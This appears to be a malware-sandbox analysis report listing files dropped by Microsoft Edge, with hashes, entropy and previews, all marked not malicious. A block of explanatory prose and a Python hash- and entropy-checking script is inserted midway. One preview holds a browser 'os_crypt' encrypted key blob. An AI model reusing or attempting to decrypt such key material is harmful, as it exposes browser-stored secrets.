                                                                                                                                                            SHA-512:B4CD706686805F232CB3D9CD743B257880D8342BA83ED42D8BF22D06A893CD62FCCCA46F2088AEE8D145F03741D1908F91FC44CF7493B2750BFEC2363C669A32
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................L.R.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.01057775872642915
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsFl:/F
                                                                                                                                                            MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                            SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                            SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                            SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):270336
                                                                                                                                                            Entropy (8bit):8.280239615765425E-4
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                            MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                            SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                            SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                            SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.011852361981932763
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsHlDll:/H
                                                                                                                                                            MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                            SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                            SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                            SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.012340643231932763
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsGl3ll:/y
                                                                                                                                                            MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                            SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                            SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                            SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):262512
                                                                                                                                                            Entropy (8bit):9.553120663130604E-4
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:LsNl6Cj:Ls36Cj
                                                                                                                                                            MD5:20AF659AFA1589D03A9D83A70C9C90C7
                                                                                                                                                            SHA1:95925495DB7E405598175C1F53E2A0B4B1962461
                                                                                                                                                            SHA-256:443C568D3FEFBEA234B6FE947C0F465A5A9805E46724C5BE9316B9E1333A09F9
                                                                                                                                                            SHA-512:0A71E5E94C6B4151A0C15B3A3661CEA3D7AE99EB8F5F20E85FE225ED93B9D7E82C2D401CCA1DDA5B5A2221BD478F0EB3F244A3EEB6BC3B13E6616C61F1A31C89
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):120
                                                                                                                                                            Entropy (8bit):3.32524464792714
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                            MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                            SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                            SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                            SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):13
                                                                                                                                                            Entropy (8bit):2.7192945256669794
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                            MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                            SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                            SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                            SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:117.0.2045.47
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6820
                                                                                                                                                            Entropy (8bit):5.791630604454772
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:iaqkHfL9whCx5ih/cI9URLl8RotonMFVvlwh3e4IbONIeTC6XQS0qGqk+Z4uj+rJ:akD9SeiRUEhp6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                            MD5:D2C04F360BBEE0CCAB877650F77D6A0D
                                                                                                                                                            SHA1:511678F6BF42EC8A7B47D8755D7DBCA93E976941
                                                                                                                                                            SHA-256:505002CE8C56D2371C17D72BB3165DE7F644FE1FBB425E28C28C28679AF5BD86
                                                                                                                                                            SHA-512:1AD370E57685FD2E62C5C07C814BC79077FE16FCC8A2953170B03C67123E9AE16E4E5AC6637F8AE11C481F07C0641D5C8E22A412698AA4AAB4CF134B5902A02F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADI/LhEPT7sQ5P1M/tRACcVEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACPfNigfdtXRXofPnAVlPSW+lMCEaS+SDrcjkNJ6KX4SgAAAAA
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):20480
                                                                                                                                                            Entropy (8bit):0.6773696719930975
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                            MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                            SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                            SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                            SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.01057775872642915
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsFl:/F
                                                                                                                                                            MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                            SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                            SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                            SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):270336
                                                                                                                                                            Entropy (8bit):8.280239615765425E-4
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                            MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                            SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                            SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                            SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.011852361981932763
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsHlDll:/H
                                                                                                                                                            MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                            SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                            SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                            SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.012340643231932763
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsGl3ll:/y
                                                                                                                                                            MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                            SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                            SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                            SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):262512
                                                                                                                                                            Entropy (8bit):9.553120663130604E-4
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:LsNlg/CsK:Ls3g6
                                                                                                                                                            MD5:FC183ACFCDA064109DBADE5B3FF4B4FD
                                                                                                                                                            SHA1:9D2188CCFD348913AB0CE9D688DFB500C7E8371D
                                                                                                                                                            SHA-256:07848491A7B891A6B9200CBDF1785D83EEE73819BD1BA85A893CD761D7467C78
                                                                                                                                                            SHA-512:8B647AB1F59D9C1F6FF7239747190BC89593709FF3B796A38AD2F70A3CDFB7978266474F85498F65697332E0DC3938B003D4B70A70D8A93892B7E686C6AE20CE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:..........................................,.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):47
                                                                                                                                                            Entropy (8bit):4.3818353308528755
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                            MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                            SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                            SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                            SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
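The record above is the one dropped file whose Preview shows its complete content (47 bytes of ASCII, no line terminators), so its Size, Entropy (8bit), Encrypted and hash fields can be recomputed offline and checked against the report. The script below does that; it is an added example, not Joe Sandbox code, and the 7.9 bits/byte cut-off it uses for the Encrypted flag is an assumption (the report does not state how that flag is derived). The sample bytes are copied from the Preview line above.

```python
import hashlib
import math
from collections import Counter

# Constructed input: the 47-byte dropped file whose Preview the report prints in
# full ("ASCII text, with no line terminators", Size (bytes): 47), copied verbatim.
SAMPLE = b"customSettings_F95BA787499AB4FA9EFFF472CE383A14"

# Assumption: the report does not say how "Encrypted" is decided; 7.9 bits/byte is
# a common heuristic cut-off for "compressed or encrypted" and is only illustrative.
ENCRYPTED_THRESHOLD = 7.9


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy over byte values, in bits per byte (0.0 for empty, 8.0 max)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def describe(data: bytes) -> dict:
    """Recompute the per-file fields carried by the report's dropped-file records."""
    ent = shannon_entropy_8bit(data)
    return {
        "size": len(data),
        "entropy": ent,
        "encrypted": ent >= ENCRYPTED_THRESHOLD,
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
    }


def matches_report(data: bytes, reported: dict) -> list:
    """Return the names of reported fields whose recomputed value disagrees."""
    got = describe(data)
    mismatched = []
    for key, value in reported.items():
        if key == "entropy":
            # floating point: compare with a tolerance rather than for equality
            if abs(got[key] - value) > 1e-9:
                mismatched.append(key)
        elif got[key] != value:
            mismatched.append(key)
    return mismatched


# Values copied from the record above (hashes as the report prints them, upper-case).
REPORTED = {
    "size": 47,
    "entropy": 4.3818353308528755,
    "encrypted": False,
    "md5": "48324111147DECC23AC222A361873FC5",
    "sha1": "0DF8B2267ABBDBD11C422D23338262E3131A4223",
    "sha256": "D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3",
}

if __name__ == "__main__":
    for key, value in describe(SAMPLE).items():
        print(f"{key}: {value}")
    print("mismatches:", matches_report(SAMPLE, REPORTED) or "none")
    # Two constructed extremes for comparison with the other records in this table:
    # a near-empty block (like the 8192-byte files at entropy ~0.01) and a
    # uniformly distributed block (like the 35302-byte file flagged Encrypted).
    print("near-empty:", describe(b"\x00" * 8190 + b"\x01\x02")["entropy"])
    print("uniform:", describe(bytes(range(256)) * 4)["encrypted"])
```

Run as-is and every reported field for the 47-byte file should recompute with no mismatches; feed it the raw bytes of any other dropped file to verify that record the same way. Note that "Encrypted:true" on the 35302-byte murmur3-headed file above only means its byte distribution is near-uniform; compressed data produces the same reading, so the flag alone does not identify a cipher.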
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):35
                                                                                                                                                            Entropy (8bit):4.014438730983427
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                            MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                            SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                            SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                            SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"forceServiceDetermination":false}
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):29
                                                                                                                                                            Entropy (8bit):3.922828737239167
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:2NGw+K+:fwZ+
                                                                                                                                                            MD5:7BAAFE811F480ACFCCCEE0D744355C79
                                                                                                                                                            SHA1:24B89AE82313084BB8BBEB9AD98A550F41DF7B27
                                                                                                                                                            SHA-256:D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
                                                                                                                                                            SHA-512:70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:customSynchronousLookupUris_0
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):35302
                                                                                                                                                            Entropy (8bit):7.99333285466604
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                            MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                            SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                            SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                            SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):81
                                                                                                                                                            Entropy (8bit):4.3439888556902035
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                            MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                            SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                            SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                            SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3581
                                                                                                                                                            Entropy (8bit):4.459693941095613
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:JTMhnytNaSA4BOsNQNhnUZTFGKDIWHCgL5tfHaaJzRHF+P1sYmnfHUdT+GWBH7Y/:KyMot7vjFU
                                                                                                                                                            MD5:BDE38FAE28EC415384B8CFE052306D6C
                                                                                                                                                            SHA1:3019740AF622B58D573C00BF5C98DD77F3FBB5CD
                                                                                                                                                            SHA-256:1F4542614473AE103A5EE3DEEEC61D033A40271CFF891AAA6797534E4DBB4D20
                                                                                                                                                            SHA-512:9C369D69298EBF087412EDA782EE72AFE5448FD0D69EA5141C2744EA5F6C36CDF70A51845CDC174838BAC0ADABDFA70DF6AEDBF6E7867578AE7C4B7805A8B55E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"models":[],"geoidMaps":{"gw_my":"https://malaysia.smartscreen.microsoft.com/","gw_tw":"https://taiwan.smartscreen.microsoft.com/","gw_at":"https://austria.smartscreen.microsoft.com/","gw_es":"https://spain.smartscreen.microsoft.com/","gw_pl":"https://poland.smartscreen.microsoft.com/","gw_se":"https://sweden.smartscreen.microsoft.com/","gw_kr":"https://southkorea.smartscreen.microsoft.com/","gw_br":"https://brazil.smartscreen.microsoft.com/","au":"https://australia.smartscreen.microsoft.com/","dk":"https://denmark.smartscreen.microsoft.com/","gw_sg":"https://singapore.smartscreen.microsoft.com/","gw_fr":"https://france.smartscreen.microsoft.com/","gw_ca":"https://canada.smartscreen.microsoft.com/","test":"https://eu-9.smartscreen.microsoft.com/","gw_il":"https://israel.smartscreen.microsoft.com/","gw_au":"https://australia.smartscreen.microsoft.com/","gw_ffl4mod":"https://unitedstates4.ss.wd.microsoft.us/","gw_ffl4":"https://unitedstates1.ss.wd.microsoft.us/","gw_eu":"https://europe.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):130439
                                                                                                                                                            Entropy (8bit):3.80180718117079
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                            MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                            SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                            SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                            SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40
                                                                                                                                                            Entropy (8bit):4.346439344671015
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                            MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                            SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                            SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
